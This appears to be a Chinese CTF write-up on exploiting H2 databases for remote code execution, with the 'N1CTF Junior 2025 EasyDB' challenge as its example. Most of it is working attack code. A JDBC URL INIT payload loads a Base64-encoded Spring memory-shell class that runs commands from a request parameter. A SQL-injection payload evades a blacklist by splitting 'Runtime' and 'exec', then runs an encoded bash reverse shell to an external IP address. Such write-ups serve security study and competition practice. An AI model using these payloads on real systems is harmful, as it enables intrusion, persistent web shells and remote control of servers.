String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ONn" +                "INFORMATION_SCHEMA.TABLES AS $$//javascriptn" +                "org.springframework.cglib.core.ReflectUtils.defineClass("InjectToController",org.springframework.util.Base64Utils.decodeFromString("yv66vgAAADQA5QoAPQB2CgB3AHgHAHkKAAMAegoAAwB7CAB8CwB9AH4LAH8AgAgAgQgAggoAgwCECgAQAIUIAIYKABAAhwcAiAcAiQgAiggAiwoADwCMCACNCACOBwCPCgAPAJAKAJEAkgoAFgCTCACUCgAWAJUKABYAlgoAFgCXCgAWAJgKAJkAmgoAmQCbCgCZAJgIAJwLAJ0AngcAnwcAoAsAJAChBwCiCABLBwCjCgApAKQHAKUIAKYKACsAjAcApwcAqAoALgCpBwCqBwCrBwCsBwCtBwCuBwCvCgAxALAIAEkKACcAsQoAJQCyBwCzCgA7ALQHALUBAARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEABjxpbml0PgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEABHRoaXMBABRMSW5qZWN0VG9Db250cm9sbGVyOwEAA2FhYQEAEkxqYXZhL2xhbmcvU3RyaW5nOwEABHRlc3QBAAMoKVYBAAFwAQAaTGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcjsBAAFvAQABYwEAE0xqYXZhL3V0aWwvU2Nhbm5lcjsBAAdyZXF1ZXN0AQAnTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7AQAIcmVzcG9uc2UBAChMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQAEYXJnMAEABndyaXRlcgEAFUxqYXZhL2lvL1ByaW50V3JpdGVyOwEADVN0YWNrTWFwVGFibGUHAKIHALYHALcHAIkHALgHAIgHAI8BAApFeGNlcHRpb25zBwC5AQAIPGNsaW5pdD4BAAdjb250ZXh0AQA3TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvV2ViQXBwbGljYXRpb25Db250ZXh0OwEAFW1hcHBpbmdIYW5kbGVyTWFwcGluZwEAVExvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZXRob2QvYW5ub3RhdGlvbi9SZXF1ZXN0TWFwcGluZ0hhbmRsZXJNYXBwaW5nOwEAB21ldGhvZDIBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAA3VybAEASExvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9jb25kaXRpb24vUGF0dGVybnNSZXF1ZXN0Q29uZGl0aW9uOwEAAm1zAQBOTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL2NvbmRpdGlvbi9SZXF1ZXN0TWV0aG9kc1JlcXVlc3RDb25kaXRpb247AQAEaW5mbwEAP0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZXRob2QvUmVxdWVzdE1hcHBpbmdJbmZvOwEAEmluamVjdFRvQ29udHJvbGxlcgEABHZhcjcBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsHALMBAApTb3VyY2VGaWxlAQAXSW5qZWN0VG9Db250cm9sbGVyLmphdmEMAEUATAcAugwAuwC8AQBAb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1NlcnZsZXRSZXF1ZXN0QXR0cmlidXRlcwwAvQC+DAC/AMABAANjbWQHALYMAMEAwgcAtwwAwwDEAQAAAQAHb3MubmFtZQcAxQwAxgDCDADHAMgBAAN3aW4MAMkAygEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgEAEGphdmEvbGFuZy9TdHJpbmcBAAdjbWQuZXhlAQACL2MMAEUAPwEABy9iaW4vc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyDADLAMwHAM0MAM4AzwwARQDQAQADXFxBDADRANIMANMA1AwA1QDIDADWAEwHALgMANcARgwA2ABMAQA5b3JnLnNwcmluZ2ZyYW1ld29yay53ZWIuc2VydmxldC5EaXNwYXRjaGVyU2VydmxldC5DT05URVhUBwDZDADaANsBADVvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L1dlYkFwcGxpY2F0aW9uQ29udGV4dAEAUm9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL21ldGhvZC9hbm5vdGF0aW9uL1JlcXVlc3RNYXBwaW5nSGFuZGxlck1hcHBpbmcMANwA3QEAEkluamVjdFRvQ29udHJvbGxlcgEAD2phdmEvbGFuZy9DbGFzcwwA3gDfAQBGb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1BhdHRlcm5zUmVxdWVzdENvbmRpdGlvbgEACC9lZGlhaXN1AQBMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1JlcXVlc3RNZXRob2RzUmVxdWVzdENvbmRpdGlvbgEANW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2JpbmQvYW5ub3RhdGlvbi9SZXF1ZXN0TWV0aG9kDABFAOABAD1vcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZXRob2QvUmVxdWVzdE1hcHBpbmdJbmZvAQBEb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1BhcmFtc1JlcXVlc3RDb25kaXRpb24BAEVvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9jb25kaXRpb24vSGVhZGVyc1JlcXVlc3RDb25kaXRpb24BAEZvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9jb25kaXRpb24vQ29uc3VtZXNSZXF1ZXN0Q29uZGl0aW9uAQBGb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1Byb2R1Y2VzUmVxdWVzdENvbmRpdGlvbgEAPm9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL2NvbmRpdGlvbi9SZXF1ZXN0Q29uZGl0aW9uDABFAOEMAEUARgwA4gDjAQATamF2YS9sYW5nL0V4Y2VwdGlvbgwA5ABMAQAQamF2YS9sYW5nL09iamVjdAEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBACZqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQEAE2phdmEvaW8vUHJpbnRXcml0ZXIBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQA8b3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1JlcXVlc3RDb250ZXh0SG9sZGVyAQAYY3VycmVudFJlcXVlc3RBdHRyaWJ1dGVzAQA9KClMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1JlcXVlc3RBdHRyaWJ1dGVzOwEACmdldFJlcXVlc3QBACkoKUxqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwEAC2dldFJlc3BvbnNlAQAqKClMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQAMZ2V0UGFyYW1ldGVyAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAAlnZXRXcml0ZXIBABcoKUxqYXZhL2lvL1ByaW50V3JpdGVyOwEAEGphdmEvbGFuZy9TeXN0ZW0BAAtnZXRQcm9wZXJ0eQEAC3RvTG93ZXJDYXNlAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAHaGFzTmV4dAEAAygpWgEABG5leHQBAAVjbG9zZQEABXdyaXRlAQAFZmx1c2gBADlvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvUmVxdWVzdEF0dHJpYnV0ZXMBAAxnZXRBdHRyaWJ1dGUBACcoTGphdmEvbGFuZy9TdHJpbmc7SSlMamF2YS9sYW5nL09iamVjdDsBAAdnZXRCZWFuAQAlKExqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvT2JqZWN0OwEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBADsoW0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9iaW5kL2Fubm90YXRpb24vUmVxdWVzdE1ldGhvZDspVgEB9ihMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1BhdHRlcm5zUmVxdWVzdENvbmRpdGlvbjtMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1JlcXVlc3RNZXRob2RzUmVxdWVzdENvbmRpdGlvbjtMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1BhcmFtc1JlcXVlc3RDb25kaXRpb247TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL2NvbmRpdGlvbi9IZWFkZXJzUmVxdWVzdENvbmRpdGlvbjtMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL0NvbnN1bWVzUmVxdWVzdENvbmRpdGlvbjtMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1Byb2R1Y2VzUmVxdWVzdENvbmRpdGlvbjtMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1JlcXVlc3RDb25kaXRpb247KVYBAA9yZWdpc3Rlck1hcHBpbmcBAG4oTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL21ldGhvZC9SZXF1ZXN0TWFwcGluZ0luZm87TGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDspVgEAD3ByaW50U3RhY2tUcmFjZQAhACcAPQAAAAAABAAJAD4APwABAEAAAAArAAAAAQAAAAGxAAAAAgBBAAAABgABAAAAFgBCAAAADAABAAAAAQBDAEQAAAABAEUARgABAEAAAAA9AAEAAgAAAAUqtwABsQAAAAIAQQAAAAoAAgAAABcABAAYAEIAAAAWAAIAAAAFAEcASAAAAAAABQBJAEoAAQABAEsATAACAEAAAAGhAAYACAAAALe4AALAAAO2AARMuAACwAADtgAFTSsSBrkABwIATiy5AAgBADoELcYAkBIJOgUSCrgAC7YADBINtgAOmQAhuwAPWQa9ABBZAxIRU1kEEhJTWQUtU7cAEzoGpwAeuwAPWQa9ABBZAxIUU1kEEhVTWQUtU7cAEzoGuwAWWRkGtgAXtgAYtwAZEhq2ABs6BxkHtgAcmQALGQe2AB2nAAUZBToFGQe2AB4ZBBkFtgAfGQS2ACAZBLYAIbEAAAADAEEAAABCABAAAAAeAAoAHwAUACAAHQAhACUAIgApACMALQAlAD0AJgBbACgAdgAuAIwALwCgADAApQAxAKwAMgCxADMAtgA5AEIAAABcAAkAWAADAE0ATgAGAC0AiQBPAEoABQB2AEAATQBOAAYAjAAqAFAAUQAHAAAAtwBHAEgAAAAKAK0AUgBTAAEAFACjAFQAVQACAB0AmgBWAEoAAwAlAJIAVwBYAAQAWQAAAC4ABf8AWwAGBwBaBwBbBwBcBwBdBwBeBwBdAAD8ABoHAF/8ACUHAGBBBwBd+AAXAGEAAAAEAAEAYgAIAGMATAABAEAAAAE1AAkABwAAAIK4AAISIgO5ACMDAMAAJEsqEiW5ACYCAMAAJUwSJxIoA70AKbYAKk27ACtZBL0AEFkDEixTtwAtTrsALlkDvQAvtwAwOgS7ADFZLRkEAcAAMgHAADMBwAA0AcAANQHAADa3ADc6BbsAJ1kSOLcAOToGKxkFGQYstgA6pwAISyq2ADyxAAEAAAB5AHwAOwADAEEAAAAyAAwAAABAAA8AQQAbAEIAJwBDADgARABFAEUAZQBGAHAARwB5AEoAfABIAH0ASQCBAE8AQgAAAFIACAAPAGoAZABlAAAAGwBeAGYAZwABACcAUgBoAGkAAgA4AEEAagBrAAMARQA0AGwAbQAEAGUAFABuAG8ABQBwAAkAcABIAAYAfQAEAHEAcgAAAFkAAAAJAAL3AHwHAHMEAAEAdAAAAAIAdQ=="),org.springframework.util.ClassUtils.getDefaultClassLoader())n"+"$$n";

例题

[N1CTF Junior 2025]EasyDB

jadx 反编译一下，login 路由用 UserService.validateUser 来处理输入的账号密码

直接插入 sql 语句中，用 SecurityUtils.check 处理完整的 sql 语句

是个黑名单

很明显就是打 sql 注入，要绕下黑名单，看依赖可以发现是 h2 的数据库，打 Alias Script RCE ，直接拼接绕过就好了

admin'; CREATE ALIAS evil AS $$void poc(String cmd) throws Exception{ String R="R"+"untime";Class<?> c = Class.forName("java.lang."+R);Object rt=c.getMethod("get"+R).invoke(null);c.getMethod("exe"+"c",String.class).invoke(rt,cmd);}$$;CALL evil('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjEuNDAuMTk1LjE5NC8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}'); --

参考

https://paper.seebug.org/1832/#init-runscript

https://www.cnblogs.com/F12-blog/p/18144377

https://unam4.github.io/2024/11/12/h2%E6%95%B0%E6%8D%AE%E5%BA%93%E5%9C%A8jdk17%E4%B8%8B%E7%9A%84rce%E6%8E%A2%E7%B4%A2/

https://unk.org.cn/2025/02/11/h2-inject/